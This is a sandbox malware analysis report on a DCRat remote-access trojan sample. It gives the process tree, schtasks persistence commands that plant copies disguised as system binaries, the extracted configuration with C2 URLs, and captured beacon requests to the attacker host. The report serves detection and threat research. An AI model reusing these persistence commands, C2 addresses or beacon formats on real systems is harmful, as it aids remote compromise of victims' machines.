Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
DFpUKTL6kg.exe

Overview

General Information

Sample name:DFpUKTL6kg.exe
renamed because original name is a hash value
Original sample name:23a1767d4e77693bd46f3abfcf10e4d7.exe
Analysis ID:1458153
MD5:23a1767d4e77693bd46f3abfcf10e4d7
SHA1:1be797ac1e5180f8bb51b359b7c8dc88daf2732e
SHA256:d675f72b0bc010f74a28dfb3401dd69dbae5d21a55624a827fa70d1041367d13
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Schedule system process
Yara detected DCRat
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Creates processes via WMI
Drops executable to a common third party application directory
Machine Learning detection for dropped file
Machine Learning detection for sample
Sigma detected: Files With System Process Name In Unsuspected Locations
Uses schtasks.exe or at.exe to add and modify task schedules
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to communicate with device drivers
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Enables debug privileges
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • DFpUKTL6kg.exe (PID: 6848 cmdline: "C:\Users\user\Desktop\DFpUKTL6kg.exe" MD5: 23A1767D4E77693BD46F3ABFCF10E4D7)
    • wscript.exe (PID: 7004 cmdline: "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 396 cmdline: C:\Windows\system32\cmd.exe /c ""C:\chainSurrogate\JOucOkolgtw8nKLZO9UO2eSMaA.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • browsersvc.exe (PID: 6544 cmdline: "C:\chainSurrogate\browsersvc.exe" MD5: 05CF6D069F5B66212AF39C9D6C440CCE)
          • schtasks.exe (PID: 7156 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6632 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6980 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6884 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6848 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5928 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\chainSurrogate\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1696 cmdline: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 10 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6284 cmdline: schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6220 cmdline: schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 13 /tr "'C:\Windows\L2Schemas\OfficeClickToRun.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 1456 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 9 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4248 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7080 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 10 /tr "'C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7004 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6520 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6280 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6632 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6980 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6884 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\internet explorer\images\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6848 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 13 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5928 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7140 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 8 /tr "'C:\Recovery\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6300 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5264 cmdline: schtasks.exe /create /tn "RuntimeBroker" /sc ONLOGON /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7104 cmdline: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 14 /tr "'C:\Recovery\RuntimeBroker.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 7072 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 4484 cmdline: schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 5852 cmdline: schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 12 /tr "'C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6316 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 6 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6936 cmdline: schtasks.exe /create /tn "UAhpvIJrmb" /sc ONLOGON /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • schtasks.exe (PID: 6960 cmdline: schtasks.exe /create /tn "UAhpvIJrmbU" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\microsoft onedrive\23.038.0219.0001\th\UAhpvIJrmb.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
          • UAhpvIJrmb.exe (PID: 6884 cmdline: "C:\Program Files (x86)\windows nt\UAhpvIJrmb.exe" MD5: 05CF6D069F5B66212AF39C9D6C440CCE)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Malware Configuration

Threatname: DCRat

{"SCRT": "{\"Q\":\"@\",\"3\":\",\",\"Z\":\"%\",\"c\":\"_\",\"G\":\"-\",\"v\":\"(\",\"C\":\";\",\"5\":\"^\",\"k\":\"*\",\"h\":\" \",\"S\":\")\",\"m\":\"&\",\"s\":\"~\",\"l\":\">\",\"8\":\"#\",\"g\":\".\",\"H\":\"|\",\"d\":\"`\",\"a\":\"$\",\"N\":\"<\",\"b\":\"!\"}", "PCRT": "{\"=\":\")\",\"M\":\"|\",\"0\":\"<\",\"D\":\"!\",\"f\":\">\",\"i\":\"-\",\"S\":\";\",\"6\":\".\",\"j\":\"%\",\"I\":\"#\",\"l\":\"^\",\"w\":\"~\",\"X\":\"@\",\"x\":\"(\",\"y\":\"&\",\"p\":\"$\",\"c\":\",\",\"Q\":\"_\",\"e\":\"`\",\"b\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-jI1oCiBH96aVG0N0JaCL", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://host1871899.hostland.pro/@==gbJBzYuFDT", "H2": "http://host1871899.hostland.pro/@==gbJBzYuFDT", "T": "0"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000004.00000002.1771032686.0000000003283000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
    00000023.00000002.1787477643.00000000030D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
      00000004.00000002.1771032686.0000000002F61000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
        Process Memory Space: browsersvc.exe PID: 6544JoeSecurity_DCRat_1Yara detected DCRatJoe Security
          Process Memory Space: UAhpvIJrmb.exe PID: 6884JoeSecurity_DCRat_1Yara detected DCRatJoe Security

            Sigma Signatures

            System Summary

            barindex
            Sigma detected: Files With System Process Name In Unsuspected Locations
            Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\chainSurrogate\browsersvc.exe, ProcessId: 6544, TargetFilename: C:\Recovery\RuntimeBroker.exe
            Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
            Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Users\user\Desktop\DFpUKTL6kg.exe", ParentImage: C:\Users\user\Desktop\DFpUKTL6kg.exe, ParentProcessId: 6848, ParentProcessName: DFpUKTL6kg.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbe" , ProcessId: 7004, ProcessName: wscript.exe

            Persistence and Installation Behavior

            barindex
            Sigma detected: Schedule system process
            Source: Process startedAuthor: Joe Security: Data: Command: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, CommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, CommandLine|base64offset|contains: j, Image: C:\Windows\System32\schtasks.exe, NewProcessName: C:\Windows\System32\schtasks.exe, OriginalFileName: C:\Windows\System32\schtasks.exe, ParentCommandLine: "C:\chainSurrogate\browsersvc.exe", ParentImage: C:\chainSurrogate\browsersvc.exe, ParentProcessId: 6544, ParentProcessName: browsersvc.exe, ProcessCommandLine: schtasks.exe /create /tn "RuntimeBrokerR" /sc MINUTE /mo 9 /tr "'C:\Recovery\RuntimeBroker.exe'" /f, ProcessId: 6300, ProcessName: schtasks.exe

            Snort Signatures

            No Snort rule has matched

            Joe Sandbox Signatures

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Antivirus / Scanner detection for submitted sample
            Source: DFpUKTL6kg.exeAvira: detected
            Antivirus detection for dropped file
            Source: C:\chainSurrogate\browsersvc.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\chainSurrogate\vdfN6ZiS0svPJatLSFe.vbeAvira: detection malicious, Label: VBS/Runner.VPG
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Windows\L2Schemas\OfficeClickToRun.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Source: C:\Recovery\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323984
            Found malware configuration
            Source: 00000023.00000002.1787477643.00000000030D1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"SCRT": "{\"Q\":\"@\",\"3\":\",\",\"Z\":\"%\",\"c\":\"_\",\"G\":\"-\",\"v\":\"(\",\"C\":\";\",\"5\":\"^\",\"k\":\"*\",\"h\":\" \",\"S\":\")\",\"m\":\"&\",\"s\":\"~\",\"l\":\">\",\"8\":\"#\",\"g\":\".\",\"H\":\"|\",\"d\":\"`\",\"a\":\"$\",\"N\":\"<\",\"b\":\"!\"}", "PCRT": "{\"=\":\")\",\"M\":\"|\",\"0\":\"<\",\"D\":\"!\",\"f\":\">\",\"i\":\"-\",\"S\":\";\",\"6\":\".\",\"j\":\"%\",\"I\":\"#\",\"l\":\"^\",\"w\":\"~\",\"X\":\"@\",\"x\":\"(\",\"y\":\"&\",\"p\":\"$\",\"c\":\",\",\"Q\":\"_\",\"e\":\"`\",\"b\":\"*\"}", "TAG": "", "MUTEX": "DCR_MUTEX-jI1oCiBH96aVG0N0JaCL", "LDTM": false, "DBG": false, "SST": 5, "SMST": 2, "BCS": 0, "AUR": 1, "ASCFG": {"searchpath": "%UsersFolder% - Fast"}, "AS": false, "ASO": false, "AD": false, "H1": "http://host1871899.hostland.pro/@==gbJBzYuFDT", "H2": "http://host1871899.hostland.pro/@==gbJBzYuFDT", "T": "0"}
            Multi AV Scanner detection for dropped file
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeVirustotal: Detection: 69%Perma Link
            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\UAhpvIJrmb.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Microsoft OneDrive\23.038.0219.0001\th\UAhpvIJrmb.exeVirustotal: Detection: 69%Perma Link
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeReversingLabs: Detection: 87%
            Source: C:\Program Files (x86)\Windows NT\UAhpvIJrmb.exeVirustotal: Detection: 69%Perma Link
            Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exeReversingLabs: Detection: 87%
            Source: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exeVirustotal: Detection: 69%Perma Link
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exeReversingLabs: Detection: 87%
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exeVirustotal: Detection: 69%Perma Link
            Source: C:\Recovery\RuntimeBroker.exeReversingLabs: Detection: 87%
            Source: C:\Recovery\RuntimeBroker.exeVirustotal: Detection: 69%Perma Link
            Source: C:\Recovery\UAhpvIJrmb.exeReversingLabs: Detection: 87%
            Source: C:\Recovery\UAhpvIJrmb.exeVirustotal: Detection: 69%Perma Link
            Source: C:\Windows\L2Schemas\OfficeClickToRun.exeReversingLabs: Detection: 87%
            Source: C:\Windows\L2Schemas\OfficeClickToRun.exeVirustotal: Detection: 69%Perma Link
            Source: C:\chainSurrogate\UAhpvIJrmb.exeReversingLabs: Detection: 87%
            Source: C:\chainSurrogate\UAhpvIJrmb.exeVirustotal: Detection: 69%Perma Link
            Source: C:\chainSurrogate\browsersvc.exeReversingLabs: Detection: 87%
            Source: C:\chainSurrogate\browsersvc.exeVirustotal: Detection: 69%Perma Link
            Multi AV Scanner detection for submitted file
            Source: DFpUKTL6kg.exeReversingLabs: Detection: 73%
            Source: DFpUKTL6kg.exeVirustotal: Detection: 59%Perma Link
            AI detected suspicious sample
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.9% probability
            Machine Learning detection for dropped file
            Source: C:\chainSurrogate\browsersvc.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeJoe Sandbox ML: detected
            Source: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeJoe Sandbox ML: detected
            Source: C:\Program Files (x86)\Internet Explorer\images\UAhpvIJrmb.exeJoe Sandbox ML: detected
            Source: C:\Windows\L2Schemas\OfficeClickToRun.exeJoe Sandbox ML: detected
            Source: C:\Recovery\RuntimeBroker.exeJoe Sandbox ML: detected
            Machine Learning detection for sample
            Source: DFpUKTL6kg.exeJoe Sandbox ML: detected
            Source: DFpUKTL6kg.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: C:\chainSurrogate\browsersvc.exeDirectory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\UAhpvIJrmb.exeJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeDirectory created: C:\Program Files\Google\Chrome\Application\117.0.5938.132\default_apps\1b42ae2595212aJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\dllhost.exeJump to behavior
            Source: C:\chainSurrogate\browsersvc.exeDirectory created: C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\RedistList\5940a34987c991Jump to behavior
            Source: DFpUKTL6kg.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
            Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: DFpUKTL6kg.exe
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_009FA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_009FA5F4
            Source: C:\Users\user\Desktop\DFpUKTL6kg.exeCode function: 0_2_00A0B8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_00A0B8E0

            Networking

            barindex
            C2 URLs / IPs found in malware configuration
            Source: Malware configuration extractorURLs: http://host1871899.hostland.pro/@==gbJBzYuFDT
            Source: Joe Sandbox ViewASN Name: HOSTLANDRU HOSTLANDRU
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: host1871899.hostland.proConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: host1871899.hostland.pro
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: host1871899.hostland.proConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=98a0f130db0732986dbbd285037a45b9&44180823e244314059c315c395e58bf0=wMyUzYyE2NyYTOiN2NwUWOxMDMyETMiNmYyY2NlJ2MhR2N0YGOlZjY&SR9=YQlyltuBOPFK4X60X HTTP/1.1Accept: */*Content-Type: text/cssUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:91.0) Gecko/20100101 Firefox/91.0Host: host1871899.hostland.pro
            Source: global trafficDNS traffic detected: DNS query: host1871899.hostland.pro
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 17 Jun 2024 04:07:10 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: keep-aliveStatus: 403 Forbidden by IP restrictionsData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 17 Jun 2024 04:07:10 GMTContent-Type: text/html; charset=utf-8Content-Length: 146Connection: keep-aliveStatus: 403 Forbidden by IP restrictionsData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://host1871899.hostland.pro
            Source: UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031C7000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://host1871899.hostland.pro/
            Source: UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031CF000.00000004.00000800.00020000.00000000.sdmp, UAhpvIJrmb.exe, 00000023.00000002.1787477643.00000000031F8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://host1871899.hostland.pro/L1nc0In.php?SR9=YQlyltuBOPFK4X60X&fd02e64b760f7e5f88bfe1f7f3ae4b4e=9
